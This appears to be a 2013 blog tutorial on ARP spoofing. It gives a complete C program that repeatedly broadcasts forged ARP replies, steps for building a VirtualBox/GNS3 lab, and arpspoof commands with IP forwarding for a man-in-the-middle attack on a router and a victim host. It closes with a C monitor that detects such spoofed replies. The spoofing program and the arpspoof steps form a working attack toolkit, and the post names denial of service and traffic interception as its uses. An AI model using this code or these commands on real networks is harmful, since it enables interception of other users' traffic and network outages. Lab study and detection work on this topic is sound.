Wednesday, July 31, 2013

ARP Reply Spoof - C code




'ARP SPOOFING - VBox+GNS3 test' contains an introduction to ARP, how it works, and ARP spoofing. To follow this post you should have a basic idea of those topics.

The program below broadcasts an ARP reply on the specified interface. The interface, source IP address and source MAC address are passed as command-line parameters. The destination MAC address is set to all ones (ff:ff:ff:ff:ff:ff), the Ethernet broadcast address. The reply is re-sent every two seconds (using sleep()) so that the genuine reply never stays cached in the targets' ARP tables.


Applications of ARP Spoofing

  • Denial of Service: The hacker broadcasts an ARP reply whose source IP is that of a router/gateway and whose source MAC is false. When a host then tries to send a packet to the router/gateway, the packet is dropped, and the hacker has cut the network off from the other side of the gateway (the internet).
  • Man-in-the-middle: Here the attacker sends an ARP reply to victim-1 claiming to be victim-2, and an ARP reply to victim-2 claiming to be victim-1. Packet forwarding is enabled on the attacker so that all packets between victim-1 and victim-2 pass through it.

ARP Packet


Ethernet Packet


#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <arpa/inet.h>
#include <signal.h>
#include <sys/socket.h>
#include <net/ethernet.h>
#include <net/if.h>
#include <netpacket/packet.h>
#include <netinet/if_ether.h>

int sock;

/* Ethernet header (14 bytes) followed by the ARP body (28 bytes) */
#define PACKET_LEN (sizeof(struct ether_header) + sizeof(struct ether_arp))

/* SIGINT handler: close the raw socket and exit cleanly on Ctrl+C */
void close_sock(int sig)
{
  (void) sig;
  close(sock);
  exit(0);
}

int main(int argc, char ** argv)
{
  char packet[PACKET_LEN];
  struct sockaddr_ll device;
  struct ether_header * eth = (struct ether_header *) packet;
  struct ether_arp * arp = (struct ether_arp *) (packet + sizeof(struct ether_header));
  unsigned int mac[ETH_ALEN], ip[4];
  int i;

  if (argc < 4)
  {
    puts("Usage: ./a.out <interface> <source ip address> <source mac address>");
    exit(1);
  }

  //Raw packet socket for ARP frames (needs root or CAP_NET_RAW)
  sock = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ARP));
  if (sock < 0)
  {
    perror("socket");
    exit(1);
  }

  signal(SIGINT, close_sock);

  memset(packet, 0, PACKET_LEN);

  //Source Hardware Address : ARP Packet
  //Parse into unsigned ints first: scanning "%x" straight into the 1-byte
  //arp_sha[] entries would write 4 bytes per field and corrupt the packet.
  if (sscanf(argv[3], "%x:%x:%x:%x:%x:%x", &mac[0], &mac[1], &mac[2],
             &mac[3], &mac[4], &mac[5]) != 6)
  {
    puts("Bad MAC address, expected aa:bb:cc:dd:ee:ff");
    exit(1);
  }
  for (i = 0; i < ETH_ALEN; i++)
    arp->arp_sha[i] = (unsigned char) mac[i];

  //Source Protocol Address : ARP Packet
  if (sscanf(argv[2], "%u.%u.%u.%u", &ip[0], &ip[1], &ip[2], &ip[3]) != 4)
  {
    puts("Bad IP address, expected a.b.c.d");
    exit(1);
  }
  for (i = 0; i < 4; i++)
    arp->arp_spa[i] = (unsigned char) ip[i];

  //Ethernet Packet
  memset(eth->ether_dhost, 0xff, ETH_ALEN); //destination address : broadcast address
  memcpy(eth->ether_shost, arp->arp_sha, ETH_ALEN); //source address
  eth->ether_type = htons(ETH_P_ARP); //type

  //ARP Packet
  arp->ea_hdr.ar_hrd = htons(ARPHRD_ETHER); //Format of hardware address
  arp->ea_hdr.ar_pro = htons(ETH_P_IP); //Format of protocol address.
  arp->ea_hdr.ar_hln = ETH_ALEN; //Length of hardware address.
  arp->ea_hdr.ar_pln = 4; //Length of protocol address.
  arp->ea_hdr.ar_op = htons(ARPOP_REPLY); //ARP operation : REPLY
  memset(arp->arp_tha, 0xff, ETH_ALEN); //Target hardware address.
  memset(arp->arp_tpa, 0x00, 4); //Target protocol address.

  //Link-layer address the kernel sends the frame from
  memset(&device, 0, sizeof(device));
  device.sll_ifindex = if_nametoindex(argv[1]); //Interface number
  if (device.sll_ifindex == 0)
  {
    perror("if_nametoindex");
    exit(1);
  }
  device.sll_family = AF_PACKET;
  device.sll_protocol = htons(ETH_P_ARP);
  memcpy(device.sll_addr, arp->arp_sha, ETH_ALEN); //Physical layer address
  device.sll_halen = ETH_ALEN; //Length of address: a single byte, so no htons()

  printf("Press Ctrl+C to stop \n");
  while (1) {
    printf("Broadcasting on %s: %s is at %s\n", argv[1], argv[2], argv[3]);
    if (sendto(sock, packet, PACKET_LEN, 0, (struct sockaddr *) &device, sizeof(device)) < 0)
      perror("sendto");
    sleep(2);
  }
  return 0;
}





Adding VirtualBox Guest to GNS3


1. Install GNS3 and VirtualBox

2. Add a 'Host-only Network' to VirtualBox Manager
File>Preferences>Network
Click the 'Add host only network' button (right side)
A 'vboxnet0' network appears in the list

3. Add a guest OS to VirtualBox

4. Add guestOS to host-only network
Right-click the newly added guestOS in the VBox manager
Settings>Networks>Adapter1
Check 'Enable Network Adapter'
Select 'Host-only adapter' in 'Attached To:'
Select 'vboxnet0' in 'Name:'
Under 'Advanced' section uncheck 'Cable connected'
Note down the MAC address


5. Selecting VBoxwrapper in GNS3
GNS3 : Edit>Preferences>VirtualBox>General Settings>Path to VBoxwrapper
Locate the 'vboxwrapper.py' in the 'vboxwrapper/'
Click 'Test Settings'
If 'VBoxwrapper and VirtualBox API 4.1.2_Ubuntu have been successfully started' appears, it's OK

6. Selecting the guestOS in GNS3
GNS3 : Edit>Preferences>VirtualBox>VirtualBox Guest
Click 'Refresh VM List'
From the 'VM List', select the guestOS and give it an 'Identifier name'
Click 'Save' , the Id Name appears in the list below 'Save'
Click 'Apply' and 'OK'

7. Adding VirtualBox guest to GNS3
Drag and drop 'VirtualBox guest' to the central panel

8. Adding Router to GNS3 and Setup an interface 
Drag and drop a Router from the left panel to the central panel
(Note: You should have loaded the particular router's IOS image in GNS3.
      See 'GNS3 non superuser setup' on how to add IOS images.)

9. Connecting Router and guestOS
Click 'Add a Link' and Select 'Ethernet'
In the central Panel, Left Click the Router and then guestOS (select an adapter if asked)
Click the '(X)' to stop adding links
A link appears between the guestOS and Router (in the central panel)
Red dots appear at both the ends of the links


10. Configuring the router 
Right-click the Router in the central panel and click 'Start'
Red dot near the Router turns green
Right-click the Router in the central panel and click 'Console'
In the terminal window that appears
Wait for it to boot (press Enter when asked to get started)
( This is not the best way to learn to configure a router. Refer to some Cisco or CCNA materials.
     I learned it from the CCNA book by Todd Lammle.
)

R3#configure terminal
R3(config)#interface ethernet 0/0
R3(config-if)#ip address 192.168.1.1 255.255.255.0
R3(config-if)#no shutdown
R3(config-if)# [[Ctrl+C]]
R3#copy running-config startup-config
[Enter]
[Enter]
R3#Exit
Close the terminal window

11. Configuring guestOS
Right-click the guestOS in the central panel and click 'Start'
Red dot near the guestOS turns green
After booting, Login and start a terminal

guestOS# ifconfig -a
 From the list that appears, find the Ethernet interface name (e.g. eth3) of the adapter whose
 HWaddr is the same as the MAC address we noted down in step 4.
guestOS# ifconfig eth3 192.168.1.2 up
 'eth3' is the adapter in my case; it can be different in yours
guestOS# ping 192.168.1.1

If the ping worked, then SUCCESS
(Note: when building larger networks, add 192.168.1.1 as the default gateway on the guestOS's adapter)

12. Save the topology setup. 

ARP SPOOFING - VBox+GNS3 test


Address Resolution Protocol (ARP) is the protocol used to resolve network layer addresses (IP addresses) into link layer addresses (MAC addresses). ARP was defined by RFC 826 in 1982. It is a request/reply protocol used only within the boundaries of a single network; it is never carried across internetwork nodes.

ARP works on Ethernet networks as follows.
When a device wishes to send data to another device over Ethernet, it must first determine the MAC address of that target given its IP address. These IP-to-MAC mappings come from an ARP cache maintained on each device. If the given IP address does not appear in a device's cache, that device cannot send to the target until it obtains a new mapping. To obtain one, the initiating device broadcasts an ARP request on the local subnet. The host with the given IP address sends an ARP reply in response to the broadcast, allowing the initiating device to update its cache and deliver messages directly to the target. ARP provides no way to authenticate replies: an ARP reply can come from any system on the segment, not only from the one that really holds the requested Layer 2 address.

In ARP spoofing the answering system, or spoofer, replies to a request for another system's address with the aim of intercepting data bound for that system. A malicious user may use ARP spoofing to perform a man-in-the-middle or denial-of-service attack on other users on the network.

In this tutorial we try a man-in-the-middle attack: the attacker sends an ARP reply to the router claiming to be the victim, and an ARP reply to the victim claiming to be the router.

Set up a network with at least two hosts connected to an Ethernet switch, and the switch connected to a router. The network I used is shown below.

Network Simulation Software : GNS3


R1      : Cisco 3620 Router | 192.168.1.1
BT5R2   : BackTrack 5 R2    | 192.168.1.2 | MAC_ID_1 | Attacker
Mint 12 : Linux Mint 12     | 192.168.1.3 | MAC_ID_2 | Victim

BT5R2
terminal#1 @ BT5R2
BT5R2# arpspoof -i eth2 -t 192.168.1.1 192.168.1.3 
This sends ARP replies to R1 stating that BT5R2 is 192.168.1.3,
so R1 saves MAC_ID_1 as the MAC address of 192.168.1.3.
The reply is sent regularly, so don't close this process.

terminal#2 @ BT5R2
BT5R2# arpspoof -i eth2 -t 192.168.1.3 192.168.1.1
This sends ARP replies to Mint 12 stating that BT5R2 is 192.168.1.1,
so Mint 12 saves MAC_ID_1 as the MAC address of 192.168.1.1.
The reply is sent regularly, so don't close this process.

terminal#3 @ BT5R2
BT5R2# echo 1 > /proc/sys/net/ipv4/ip_forward
Enable IP forwarding
BT5R2# wireshark & 
So that you can capture the packets for verification


Mint 12
Mint12# ping 192.168.1.1
Ping R1, then check Wireshark @ BT5R2 for 'Redirect' packets.
Those packets are highlighted in black.

R1
To check R1 ARP mapping 
R1#show arp
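Checking R1's ARP table with show arp only reveals the poisoning after the fact. As an added example (my code, not from the original posts), the C monitor below parses raw Ethernet/ARP frames and flags the two signs of the traffic produced on this page: a reply sent to the broadcast MAC, as the program in the first post emits, and a sender IP that shows up with a different MAC than previously learned, as the arpspoof replies in this lab cause. The frame builder, the MAC/IP values and the tiny binding table are constructed for the demonstration.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#define FRAME_LEN 42   /* 14-byte Ethernet II header + 28-byte Ethernet/IPv4 ARP body */
#define TABLE_SIZE 8   /* constructed, deliberately tiny binding table */
/* IP-to-MAC bindings the monitor learns; it trusts the first reply it sees for an IP. */
static struct { uint8_t ip[4], mac[6]; int used; } table[TABLE_SIZE];
static const uint8_t BCAST[6] = {0xff, 0xff, 0xff, 0xff, 0xff, 0xff};

/* Inspects one raw frame. Bitmask: 1 = ARP reply addressed to the broadcast MAC (unsolicited,
 * what the C program on this page sends), 2 = sender IP already bound to a different MAC
 * (what arpspoof's unicast replies cause). 0 = not an ARP reply, or nothing suspicious. */
int check_arp_frame(const uint8_t *f, size_t len)
{
    if (len < FRAME_LEN || f[12] != 0x08 || f[13] != 0x06) return 0; /* EtherType 0x0806 = ARP */
    const uint8_t *arp = f + 14, *sha = arp + 8, *spa = arp + 14;  /* sender MAC, sender IP */
    if (arp[6] != 0 || arp[7] != 2) return 0;         /* opcode 2 = reply; requests are ignored */
    int flags = memcmp(f, BCAST, 6) == 0 ? 1 : 0;     /* destination MAC is ff:ff:ff:ff:ff:ff */
    for (int i = 0; i < TABLE_SIZE; i++)
        if (table[i].used && memcmp(table[i].ip, spa, 4) == 0)
            return memcmp(table[i].mac, sha, 6) ? flags | 2 : flags;
    for (int i = 0; i < TABLE_SIZE; i++)              /* first sighting: learn the binding */
        if (!table[i].used) {
            memcpy(table[i].ip, spa, 4); memcpy(table[i].mac, sha, 6); table[i].used = 1;
            break;
        }
    return flags;
}

/* Constructs a reply frame shaped like the post's program (hardware type 1, protocol 0x0800,
 * opcode 2, target MAC all ones, target IP 0.0.0.0). Used only to feed the checker. */
void build_reply(uint8_t *f, const uint8_t *dst, const uint8_t *sha, const uint8_t *spa)
{
    memset(f, 0, FRAME_LEN);
    memcpy(f, dst, 6); memcpy(f + 6, sha, 6); f[12] = 0x08; f[13] = 0x06;
    uint8_t *a = f + 14;
    a[1] = 1; a[2] = 0x08; a[4] = 6; a[5] = 4; a[7] = 2;
    memcpy(a + 8, sha, 6); memcpy(a + 14, spa, 4); memset(a + 18, 0xff, 6);
}

int main(void)
{   /* constructed addresses: a host, the real gateway, and a second MAC claiming the gateway IP */
    const uint8_t host[6] = {0x08, 0, 0x27, 0x11, 0x22, 0x33}, gw[6] = {0, 0x1d, 0x46, 0xaa, 0xbb, 0xcc};
    const uint8_t other[6] = {0x08, 0, 0x27, 0x44, 0x55, 0x66}, gw_ip[4] = {192, 168, 1, 1};
    uint8_t frame[FRAME_LEN];
    build_reply(frame, host, gw, gw_ip);
    printf("unicast reply from gateway: %d\n", check_arp_frame(frame, FRAME_LEN)); /* 0 */
    build_reply(frame, BCAST, other, gw_ip);
    printf("broadcast reply, new MAC:   %d\n", check_arp_frame(frame, FRAME_LEN)); /* 3 */
    return 0;
}
```

A real monitor would feed check_arp_frame() every frame read from a capture on the segment and alert on any non-zero result, which covers both the broadcast program and the unicast arpspoof case above.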